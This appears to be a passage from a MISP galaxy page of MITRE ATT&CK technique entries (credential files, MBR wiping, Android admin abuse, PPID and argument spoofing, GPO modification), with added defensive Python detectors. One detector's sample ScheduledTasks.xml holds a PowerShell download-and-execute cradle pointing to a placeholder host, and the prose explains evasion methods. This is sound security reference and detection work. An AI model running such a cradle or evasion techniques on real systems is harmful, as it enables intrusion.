In cloud and/or containerized environments, authenticated user and service account credentials are often stored in local configuration and credential files.(Citation: Unit 42 Hildegard Malware) They may also be found as parameters to deployment commands in container logs.(Citation: Unit 42 Unsecured Docker Daemons) In some cases, these files can be copied and reused on another machine or the contents can be read and then used to authenticate without needing to copy any files.(Citation: Specter Ops - Cloud Credential Storage)
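What this looks like in practice is a file walk with a handful of patterns: cloud credential files, configuration files with <code>password=</code> lines, Group Policy Preferences <code>cpassword</code> attributes, private keys, and secrets passed on a <code>docker run</code> command line that ended up in a log. The following added example (not from ATT&CK, MISP or the cited reports) writes a small constructed tree into a temporary directory and scans it; the patterns and file contents are this example's own, and the AWS key values are Amazon's published placeholder examples rather than real credentials.

```python
import os
import re
import tempfile

# Added example: scan a file tree for insecurely stored credentials.
# The patterns are this example's own starting set; tune them to your environment.
PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "aws_secret_access_key": re.compile(r"(?i)aws_secret_access_key\s*[=:]\s*['\"]?[A-Za-z0-9/+]{40}"),
    "password_assignment": re.compile(r"(?i)\b(?:password|passwd|pwd)\s*[=:]\s*['\"]?[^\s'\"]{4,}"),
    # GPP cpassword is recoverable: Microsoft published the AES key (see the MS14-025 link above).
    "gpp_cpassword": re.compile(r'cpassword="[^"]+"'),
    "private_key": re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----"),
    # Secrets handed to containers on the command line survive in daemon/shell logs.
    "docker_env_secret": re.compile(r"(?i)docker\s+run.*?\s-e\s+\w*(?:SECRET|TOKEN|PASSWORD|KEY)\w*=\S+"),
}


def mask(text):
    """Keep reports from becoming a second copy of the secret."""
    return text if len(text) <= 12 else text[:6] + "..." + text[-3:]


def scan_file(path, rel):
    findings = []
    try:
        with open(path, "r", encoding="utf-8", errors="replace") as fh:
            for lineno, line in enumerate(fh, 1):
                for kind, rx in PATTERNS.items():
                    m = rx.search(line)
                    if m:
                        findings.append({"file": rel, "line": lineno, "kind": kind,
                                         "snippet": mask(m.group(0))})
    except OSError:
        pass                                  # unreadable file: skip, do not abort the sweep
    return findings


def scan_tree(root, max_size=1_000_000):
    """Walk root (symlinks are not followed) and scan every regular file up to max_size bytes."""
    findings = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            if os.path.islink(path) or os.path.getsize(path) > max_size:
                continue
            findings.extend(scan_file(path, os.path.relpath(path, root)))
    return sorted(findings, key=lambda f: (f["file"], f["line"]))


# Constructed sample tree. The AWS values are Amazon's documented placeholder keys.
SAMPLES = {
    ".aws/credentials": "[default]\naws_access_key_id = AKIAIOSFODNN7EXAMPLE\n"
                        "aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\n",
    "app/config.ini": "[db]\nhost=db.internal\npassword=Winter2024!\n",
    "Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Machine/Preferences/Groups/Groups.xml":
        '<Properties action="U" userName="localadmin" '
        'cpassword="j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw"/>\n',
    "keys/id_rsa": "-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAA\n",
    "var/log/docker.log": 'level=info msg="docker run -e DB_PASSWORD=hunter2 '
                          '-e API_TOKEN=abcd1234 registry.internal/app:1.2"\n',
    "README.md": "Set the password via the PASSWORD env var at runtime.\n",
}


def demo():
    """Write SAMPLES into a temporary directory, scan it and return the findings."""
    with tempfile.TemporaryDirectory() as root:
        for rel, text in SAMPLES.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w", encoding="utf-8") as fh:
                fh.write(text)
        return scan_tree(root)


if __name__ == "__main__":
    for f in demo():
        print(f"{f['file']}:{f['line']}  {f['kind']}  {f['snippet']}")
```

The README line is the deliberate negative case: the word "password" alone is not a finding, only an assignment is. Run the same sweep over a mounted VM disk image or backup and it covers the backup case described above without touching the live host.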

The tag is: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001"

Table 5709. Table References

Links

http://blogs.technet.com/b/srd/archive/2014/05/13/ms14-025-an-update-for-group-policy-preferences.aspx

http://carnal0wnage.attackresearch.com/2014/05/mimikatz-against-virtual-machine-memory.html

https://attack.mitre.org/techniques/T1552/001

https://posts.specterops.io/head-in-the-clouds-bd038bb69e48

https://unit42.paloaltonetworks.com/attackers-tactics-and-techniques-in-unsecured-docker-daemons-revealed/

https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/

Disk Structure Wipe - T1561.002

Adversaries may corrupt or wipe the disk data structures on a hard drive necessary to boot a system; targeting specific critical systems or in large numbers in a network to interrupt availability to system and network resources.

Adversaries may attempt to render the system unable to boot by overwriting critical data located in structures such as the master boot record (MBR) or partition table.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) The data contained in disk structures may include the initial executable code for loading an operating system or the location of the file system partitions on disk. If this information is not present, the computer will not be able to load an operating system during the boot process, leaving the computer unavailable. [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) may be performed in isolation, or along with [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) if all sectors of a disk are wiped.

On network devices, adversaries may reformat the file system using [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as <code>format</code>.(Citation: format_cmd_cisco)

To maximize impact on the target organization, malware designed for destroying disk structures may have worm-like features to propagate across a network by leveraging other techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)
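The structures named above (bootstrap code, partition table, boot signature) all sit in the first 512 bytes, so a forensic triage of a "won't boot" host starts by reading that sector. The following added example (written for this page, not code from ATT&CK, MISP or the cited Shamoon reports) parses an MBR, reports the partition entries, and classifies the sector as intact, blank (zero-wiped), signature-destroyed, or code-only. The sectors it builds are constructed; the five-byte bootstrap stub is a placeholder, not a real boot loader.

```python
import struct

# Added example: parse sector 0 and tell an intact MBR from a wiped or corrupted one.
SECTOR = 512
PARTITION_TABLE_OFFSET = 446
ENTRY_FORMAT = "<B3sB3sII"            # status, CHS start, type, CHS end, LBA start, sector count
BOOT_SIGNATURE = b"\x55\xAA"          # bytes 510-511


def parse_mbr(sector):
    if len(sector) != SECTOR:
        raise ValueError("expected one 512-byte sector")
    partitions = []
    for index in range(4):
        status, _, ptype, _, lba_start, count = struct.unpack_from(
            ENTRY_FORMAT, sector, PARTITION_TABLE_OFFSET + 16 * index)
        if ptype != 0:                # type 0x00 marks an unused entry
            partitions.append({"index": index, "bootable": status == 0x80, "type": ptype,
                               "lba_start": lba_start, "sectors": count})
    return {"signature_ok": sector[510:512] == BOOT_SIGNATURE,
            "boot_code_present": any(sector[:440]),     # bytes 0-439 hold the bootstrap code
            "partitions": partitions}


def assess_mbr(sector):
    """'ok', 'wiped' (all zero), 'bad-signature' (overwritten but not blank) or 'no-partitions'."""
    info = parse_mbr(sector)
    if info["signature_ok"] and info["partitions"]:
        return "ok"
    if not (info["signature_ok"] or info["boot_code_present"] or info["partitions"]):
        return "wiped"
    if not info["signature_ok"]:
        return "bad-signature"        # firmware will refuse to hand off without 0x55AA
    return "no-partitions"


def make_mbr(partitions, boot_code=b"\xfa\x33\xc0\x8e\xd0", signed=True):
    """Constructed sector 0: a placeholder stub, (type, lba_start, count, bootable) entries
    and, unless signed=False, the boot signature."""
    sector = bytearray(SECTOR)
    sector[:len(boot_code)] = boot_code
    for index, (ptype, lba_start, count, bootable) in enumerate(partitions):
        struct.pack_into(ENTRY_FORMAT, sector, PARTITION_TABLE_OFFSET + 16 * index,
                         0x80 if bootable else 0x00, b"\0\0\0", ptype, b"\0\0\0", lba_start, count)
    if signed:
        sector[510:512] = BOOT_SIGNATURE
    return bytes(sector)


def check_device(path):
    """Classify sector 0 of a block device or disk image (reading /dev/sdX needs root)."""
    with open(path, "rb") as fh:
        return assess_mbr(fh.read(SECTOR))


if __name__ == "__main__":
    healthy = make_mbr([(0x07, 2048, 204800, True)])          # one NTFS partition at LBA 2048
    for label, sector in (("healthy", healthy), ("zeroed", bytes(SECTOR)),
                          ("signature gone", make_mbr([(0x07, 2048, 204800, True)], signed=False))):
        print(f"{label}: {assess_mbr(sector)} {parse_mbr(sector)['partitions']}")
```

Two caveats for real disks: a GPT disk carries a protective MBR with a single type 0xEE entry, which this check reports as "ok" (the real table is in the following sectors), and a wiper that overwrites sector 0 with non-zero data lands in the "bad-signature" branch rather than "wiped", so treat both results as destructive.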

The tag is: misp-galaxy:mitre-attack-pattern="Disk Structure Wipe - T1561.002"

Table 5710. Table References

Links

http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/

https://attack.mitre.org/techniques/T1561/002

https://docs.microsoft.com/sysinternals/downloads/sysmon

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180722/Report_Shamoon_StoneDrill_final.pdf

https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/

https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/fundamentals/command/cf_command_ref/F_through_K.html#wp2829794668

https://www.fireeye.com/blog/threat-research/2016/11/fireeye_respondsto.html

https://www.symantec.com/connect/blogs/shamoon-attacks

Device Administrator Permissions - T1626.001

Adversaries may abuse Android’s device administration API to obtain a higher degree of control over the device. By abusing the API, adversaries can perform several nefarious actions, such as resetting the device’s password for [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1642), factory resetting the device for [File Deletion](https://attack.mitre.org/techniques/T1630/002) and to delete any traces of the malware, disabling all the device’s cameras, or to make it more difficult to uninstall the app.

Device administrators must be approved by the user at runtime, with a system popup showing which actions have been requested by the app. In conjunction with other techniques, such as [Input Injection](https://attack.mitre.org/techniques/T1516), an app can programmatically grant itself administrator permissions without any user input.

The tag is: misp-galaxy:mitre-attack-pattern="Device Administrator Permissions - T1626.001"

Table 5711. Table References

Links

https://attack.mitre.org/techniques/T1626/001

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-22.html

Suppress Application Icon - T1628.001

A malicious application could suppress its icon from being displayed to the user in the application launcher. This hides the fact that it is installed, and can make it more difficult for the user to uninstall the application. Hiding the application’s icon programmatically does not require any special permissions.

This behavior has been seen in the BankBot/Spy Banker family of malware.(Citation: android-trojan-steals-paypal-2fa)(Citation: sunny-stolen-credentials)(Citation: bankbot-spybanker)

Beginning in Android 10, changes were introduced to inhibit malicious applications’ ability to hide their icon. If an app is a system app, requests no permissions, or does not have a launcher activity, the application’s icon will be fully hidden. Further, if the device is fully managed or the application is in a work profile, the icon will be fully hidden. Otherwise, a synthesized activity is shown, which is a launcher icon that represents the app’s details page in the system settings. If the user clicks the synthesized activity in the launcher, they are taken to the application’s details page in the system settings.(Citation: Android 10 Limitations to Hiding App Icons)(Citation: LauncherApps getActivityList)

The tag is: misp-galaxy:mitre-attack-pattern="Suppress Application Icon - T1628.001"

Table 5712. Table References

Links

https://attack.mitre.org/techniques/T1628/001

https://developer.android.com/reference/kotlin/android/content/pm/LauncherApps#getactivitylist

https://source.android.com/setup/start/android-10-release#limitations_to_hiding_app_icons

https://www.cyber.nj.gov/threat-profiles/android-malware-variants/bankbot-spybanker

https://www.welivesecurity.com/2017/02/22/sunny-chance-stolen-credentials-malicious-weather-app-found-google-play/

https://www.welivesecurity.com/2018/12/11/android-trojan-steals-money-paypal-accounts-2fa/

Prevent Application Removal - T1629.001

Adversaries may abuse the Android device administration API to prevent the user from uninstalling a target application. In earlier versions of Android, device administrator applications needed their administration capabilities explicitly deactivated by the user before the application could be uninstalled. This was later updated so the user could deactivate and uninstall the administrator application in one step.

Adversaries may also abuse the device accessibility APIs to prevent removal. This set of APIs allows the application to perform certain actions on behalf of the user and programmatically determine what is being shown on the screen. The malicious application could monitor the device screen for certain modals (e.g., the confirmation modal to uninstall an application) and inject screen input or a back button tap to close the modal. For example, Android’s performGlobalAction(int) API could be utilized to prevent the user from removing the malicious application from the device after installation. If the user wants to uninstall the malicious application, two cases may occur, both preventing the user from removing the application.

  • Case 1: If the integer argument passed to the API call is 2 or GLOBAL_ACTION_HOME, the malicious application may direct the user to the home screen from settings screen

  • Case 2: If the integer argument passed to the API call is 1 or GLOBAL_ACTION_BACK, the malicious application may emulate the back press event

The tag is: misp-galaxy:mitre-attack-pattern="Prevent Application Removal - T1629.001"

Table 5713. Table References

Links

https://attack.mitre.org/techniques/T1629/001

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-22.html

Parent PID Spoofing - T1134.004

Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. New processes are typically spawned directly from their parent, or calling, process unless explicitly specified. One way of explicitly assigning the PPID of a new process is via the <code>CreateProcess</code> API call, which supports a parameter that defines the PPID to use.(Citation: DidierStevens SelectMyParent Nov 2009) This functionality is used by Windows features such as User Account Control (UAC) to correctly set the PPID after a requested elevated process is spawned by SYSTEM (typically via <code>svchost.exe</code> or <code>consent.exe</code>) rather than the current user context.(Citation: Microsoft UAC Nov 2018)

Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) to be <code>explorer.exe</code> rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)

Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as <code>lsass.exe</code>), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)

The tag is: misp-galaxy:mitre-attack-pattern="Parent PID Spoofing - T1134.004"

Table 5714. Table References

Links

https://attack.mitre.org/techniques/T1134/004

https://blog.christophetd.fr/building-an-office-macro-to-spoof-process-parent-and-command-line/

https://blog.didierstevens.com/2009/11/22/quickpost-selectmyparent-or-playing-with-the-windows-process-tree/

https://blog.xpnsec.com/becoming-system/

https://docs.microsoft.com/windows/desktop/ProcThread/process-creation-flags

https://docs.microsoft.com/windows/security/identity-protection/user-account-control/how-user-account-control-works

https://www.countercept.com/blog/detecting-parent-pid-spoofing/

https://www.securityinbits.com/malware-analysis/parent-pid-spoofing-stage-2-ataware-ransomware-part-3

Outlook Home Page - T1137.004

Adversaries may abuse Microsoft Outlook’s Home Page feature to obtain persistence on a compromised system. Outlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page.(Citation: SensePost Outlook Home Page)

Once malicious home pages have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious Home Pages will execute when the right Outlook folder is loaded/reloaded.(Citation: SensePost Outlook Home Page)

The tag is: misp-galaxy:mitre-attack-pattern="Outlook Home Page - T1137.004"

Table 5715. Table References

Links

https://attack.mitre.org/techniques/T1137/004

https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack

https://github.com/sensepost/notruler

https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/

Identify Business Tempo - T1591.003

Adversaries may gather information about the victim’s business tempo that can be used during targeting. Information about an organization’s business tempo may include a variety of details, including operational hours/days of the week. This information may also reveal times/dates of purchases and shipments of the victim’s hardware and software resources.

Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about business tempo may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).

The tag is: misp-galaxy:mitre-attack-pattern="Identify Business Tempo - T1591.003"

Table 5716. Table References

Links

https://attack.mitre.org/techniques/T1591/003

https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/

Domain Generation Algorithms - T1637.001

Adversaries may use [Domain Generation Algorithms](https://attack.mitre.org/techniques/T1637/001) (DGAs) to procedurally generate domain names for uses such as command and control communication or malicious application distribution.(Citation: securelist rotexy 2018)

DGAs increase the difficulty for defenders to block, track, or take over the command and control channel, as there could potentially be thousands of domains that malware can check for instructions.

The tag is: misp-galaxy:mitre-attack-pattern="Domain Generation Algorithms - T1637.001"

Table 5717. Table References

Links

https://attack.mitre.org/techniques/T1637/001

https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/

https://securelist.com/the-rotexy-mobile-trojan-banker-and-ransomware/88893/

Group Policy Modification - T1484.001

Adversaries may modify Group Policy Objects (GPOs) to subvert the intended discretionary access controls for a domain, usually with the intention of escalating privileges on the domain. Group policy allows for centralized management of user and computer settings in Active Directory (AD). GPOs are containers for group policy settings made up of files stored within a predictable network path <code>\\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\</code>.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016)

Like other objects in AD, GPOs have access controls associated with them. By default all user accounts in the domain have permission to read GPOs. It is possible to delegate GPO access control permissions, e.g. write access, to specific users or groups in the domain.

Malicious GPO modifications can be used to implement many other malicious behaviors such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001), [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105), [Create Account](https://attack.mitre.org/techniques/T1136), [Service Execution](https://attack.mitre.org/techniques/T1569/002), and more.(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions)(Citation: Mandiant M Trends 2016)(Citation: Microsoft Hacking Team Breach) Since GPOs can control so many user and machine settings in the AD environment, there are a great number of potential attacks that can stem from this GPO abuse.(Citation: Wald0 Guide to GPOs)

For example, publicly available scripts such as <code>New-GPOImmediateTask</code> can be leveraged to automate the creation of a malicious [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) by modifying GPO settings, in this case modifying <code><GPO_PATH>\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml</code>.(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions) In some cases an adversary might modify specific user rights like SeEnableDelegationPrivilege, set in <code><GPO_PATH>\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf</code>, to achieve a subtle AD backdoor with complete control of the domain because the user account under the adversary’s control would then be able to modify GPOs.(Citation: Harmj0y SeEnableDelegationPrivilege Right)
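Both artifacts named above are plain files in SYSVOL, so they can be checked directly rather than only through GPO change auditing. The following added example (not code from ATT&CK, MISP, PowerView or the cited posts) parses a <code>GptTmpl.inf</code> for unexpected holders of <code>SeEnableDelegationPrivilege</code> and a <code>ScheduledTasks.xml</code> for immediate tasks that launch a scripting host as SYSTEM. The two files below are constructed; the allowed-SID set (BUILTIN\Administrators only) and the LOLBin list are this example's assumptions, to be replaced by the domain's own baseline.

```python
import configparser
import xml.etree.ElementTree as ET

# Added example: check GPO files pulled from SYSVOL for the two modifications described above.
# ALLOWED_DELEGATION and LOLBINS are assumptions for this example; build them from your baseline.
ALLOWED_DELEGATION = {"*S-1-5-32-544"}            # BUILTIN\Administrators
LOLBINS = {"cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe", "rundll32.exe",
           "regsvr32.exe", "wscript.exe", "cscript.exe"}


def check_gpttmpl(text):
    """Flag SeEnableDelegationPrivilege holders outside ALLOWED_DELEGATION in a GptTmpl.inf."""
    cp = configparser.ConfigParser(interpolation=None, strict=False, delimiters=("=",))
    cp.optionxform = str                           # keep the case of the right names
    cp.read_string(text)
    findings = []
    if cp.has_section("Privilege Rights"):
        for right, holders in cp.items("Privilege Rights"):
            sids = {h.strip() for h in holders.split(",") if h.strip()}
            if right == "SeEnableDelegationPrivilege" and sids - ALLOWED_DELEGATION:
                findings.append({"right": right, "unexpected": sorted(sids - ALLOWED_DELEGATION)})
    return findings


def check_scheduled_tasks(xml_text):
    """Report GPP tasks that are immediate, run as SYSTEM, or launch a scripting host."""
    findings = []
    root = ET.fromstring(xml_text)
    for task in root.iter():
        if task.tag not in ("ImmediateTaskV2", "TaskV2", "ImmediateTask", "Task"):
            continue
        props = task.find("Properties")
        if props is None:                          # the nested <Task version=...> element
            continue
        run_as = props.get("runAs", "")
        reasons = []
        if task.tag.startswith("Immediate"):
            reasons.append("immediate task: runs once at the next policy refresh, then is removed")
        if run_as.upper().endswith("SYSTEM"):
            reasons.append(f"runs as {run_as}")
        for exe in props.iter("Exec"):
            command = exe.findtext("Command", "")
            if command.lower().rsplit("\\", 1)[-1] in LOLBINS:
                reasons.append(f"launches {command} {exe.findtext('Arguments', '')}".strip())
        if reasons:
            findings.append({"task": task.get("name") or props.get("name"), "reasons": reasons})
    return findings


# Constructed GptTmpl.inf: Administrators plus one domain user hold the delegation right.
SAMPLE_GPTTMPL = """[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Privilege Rights]
SeEnableDelegationPrivilege = *S-1-5-32-544,*S-1-5-21-1111111111-2222222222-3333333333-1105
"""

# Constructed ScheduledTasks.xml: an immediate task running PowerShell as SYSTEM.
SAMPLE_TASKS_XML = """<ScheduledTasks clsid="{CC63F200-7309-4ba0-B154-A71CD118DBCC}">
  <ImmediateTaskV2 clsid="{9756B581-76EC-4169-9AFC-0CA8D43ADB5F}" name="Updater" changed="2024-01-01 00:00:00">
    <Properties action="C" name="Updater" runAs="NT AUTHORITY\\System" logonType="S4U">
      <Task version="1.3">
        <Actions Context="Author">
          <Exec>
            <Command>powershell.exe</Command>
            <Arguments>-nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://files.example.invalid/a.ps1')"</Arguments>
          </Exec>
        </Actions>
      </Task>
    </Properties>
  </ImmediateTaskV2>
</ScheduledTasks>
"""

if __name__ == "__main__":
    print(check_gpttmpl(SAMPLE_GPTTMPL))
    print(check_scheduled_tasks(SAMPLE_TASKS_XML))
```

When reading the real files, note that <code>GptTmpl.inf</code> in SYSVOL is normally UTF-16 with a byte-order mark (<code>open(path, encoding="utf-16")</code>), and that an immediate task is consumed on the next refresh, so a scheduled pull of SYSVOL can miss it; pairing this with file-change monitoring on the Policies share closes that gap.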

The tag is: misp-galaxy:mitre-attack-pattern="Group Policy Modification - T1484.001"

Table 5718. Table References

Links

http://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/

http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/

https://adsecurity.org/?p=2716

https://attack.mitre.org/techniques/T1484/001

https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/

https://wald0.com/?p=179

https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-mtrends-2016.pdf

https://www.microsoft.com/security/blog/2016/06/01/hacking-team-breach-a-cyber-jurassic-park/

Process Argument Spoofing - T1564.010

Adversaries may attempt to hide process command-line arguments by overwriting process memory. Process command-line arguments are stored in the process environment block (PEB), a data structure used by Windows to store various information about/used by a process. The PEB includes the process command-line arguments that are referenced when executing the process. When a process is created, defensive tools/sensors that monitor process creations may retrieve the process arguments from the PEB.(Citation: Microsoft PEB 2021)(Citation: Xpn Argue Like Cobalt 2019)

Adversaries may manipulate a process PEB to evade defenses. For example, [Process Hollowing](https://attack.mitre.org/techniques/T1055/012) can be abused to spawn a process in a suspended state with benign arguments. After the process is spawned and the PEB is initialized (and process information is potentially logged by tools/sensors), adversaries may override the PEB to modify the command-line arguments (ex: using the [Native API](https://attack.mitre.org/techniques/T1106) <code>WriteProcessMemory()</code> function) then resume process execution with malicious arguments.(Citation: Cobalt Strike Arguments 2019)(Citation: Xpn Argue Like Cobalt 2019)(Citation: Nviso Spoof Command Line 2020)

Adversaries may also execute a process with malicious command-line arguments then patch the memory with benign arguments that may bypass subsequent process memory analysis.(Citation: FireEye FiveHands April 2021)

This behavior may also be combined with other tricks (such as [Parent PID Spoofing](https://attack.mitre.org/techniques/T1134/004)) to manipulate or further evade process-based detections.
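Both this technique and Parent PID Spoofing above defeat a sensor that trusts a single snapshot of the new process's own bookkeeping. The detection in each case is the same shape: keep a second, independent view and compare. The following added example (written for this page; not code from ATT&CK, MISP or the cited posts) models that for both. For PPID spoofing it compares the parent the process claims against the process that actually issued the create call, which the Countercept write-up cited above obtains from the process id in the ETW event header; for argument spoofing it compares the creation-time command line against a later read of the PEB. The record fields, the process table and the events are this example's own constructed data, and the <code>-enc</code> payload is a base64 fragment made up for the sample.

```python
from dataclasses import dataclass

# Added example: compare two views of each process creation to catch PPID and argument spoofing.
# Field names are this example's own; the data below is constructed.


@dataclass
class ProcessStart:
    pid: int
    image: str
    claimed_ppid: int        # parent recorded in the new process (Sysmon Event ID 1 ParentProcessId)
    caller_pid: int          # process that actually called CreateProcess (ETW event-header process id)
    cmdline_at_start: str    # command line captured when the process was created


# UAC's elevation path legitimately sets another parent (see the description above).
KNOWN_REPARENTERS = {"consent.exe", "svchost.exe"}


def detect_ppid_spoof(events, images):
    """images: pid -> image name. Alert when the creator is not the claimed parent."""
    alerts = []
    for e in events:
        if e.claimed_ppid == e.caller_pid:
            continue
        caller = images.get(e.caller_pid, "?")
        if caller.lower() in KNOWN_REPARENTERS:
            continue                                   # expected reparenting, not spoofing
        alerts.append({"rule": "ppid-spoof", "pid": e.pid, "image": e.image,
                       "claimed_parent": images.get(e.claimed_ppid, "?"), "real_creator": caller})
    return alerts


def detect_arg_spoof(events, current_cmdlines):
    """current_cmdlines: pid -> command line read from the PEB now (e.g. by a periodic scan).
    Any difference from the creation-time copy means the PEB was rewritten after start,
    whichever direction the change went."""
    alerts = []
    for e in events:
        now = current_cmdlines.get(e.pid)
        if now is not None and now != e.cmdline_at_start:
            alerts.append({"rule": "argument-spoof", "pid": e.pid, "image": e.image,
                           "at_start": e.cmdline_at_start, "now": now})
    return alerts


# Constructed process table and creation records.
IMAGES = {1234: "explorer.exe", 4120: "WINWORD.EXE", 800: "consent.exe",
          5000: "powershell.exe", 5100: "cmd.exe", 5200: "notepad.exe"}

EVENTS = [
    # macro in WINWORD spawns PowerShell but names explorer.exe as the parent
    ProcessStart(5000, "powershell.exe", claimed_ppid=1234, caller_pid=4120,
                 cmdline_at_start="powershell.exe -nop -w hidden"),
    # elevated cmd.exe: consent.exe creates it and reparents it to explorer.exe
    ProcessStart(5100, "cmd.exe", claimed_ppid=1234, caller_pid=800, cmdline_at_start="cmd.exe"),
    # ordinary launch from the shell
    ProcessStart(5200, "notepad.exe", claimed_ppid=1234, caller_pid=1234,
                 cmdline_at_start="notepad.exe C:\\notes.txt"),
]

# Command lines as read from each PEB some seconds later; 5000 was rewritten after start.
CURRENT_CMDLINES = {
    5000: "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA",
    5100: "cmd.exe",
    5200: "notepad.exe C:\\notes.txt",
}

if __name__ == "__main__":
    for alert in detect_ppid_spoof(EVENTS, IMAGES) + detect_arg_spoof(EVENTS, CURRENT_CMDLINES):
        print(alert)
```

The argument check needs the creation-time copy to be stored somewhere the process cannot reach; a scanner that only ever reads the live PEB sees whatever the adversary last wrote there, which is exactly the FiveHands case above.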

The tag is: misp-galaxy:mitre-attack-pattern="Process Argument Spoofing - T1564.010"

Table 5719. Table References

Links

https://attack.mitre.org/techniques/T1564/010

https://blog.cobaltstrike.com/2019/01/02/cobalt-strike-3-13-why-do-we-argue/

https://blog.nviso.eu/2020/02/04/the-return-of-the-spoof-part-2-command-line-spoofing/

https://blog.xpnsec.com/how-to-argue-like-cobalt-strike/

https://docs.microsoft.com/en-us/windows/win32/api/winternl/ns-winternl-peb

https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html

https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode

Setuid and Setgid - T1548.001

An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.

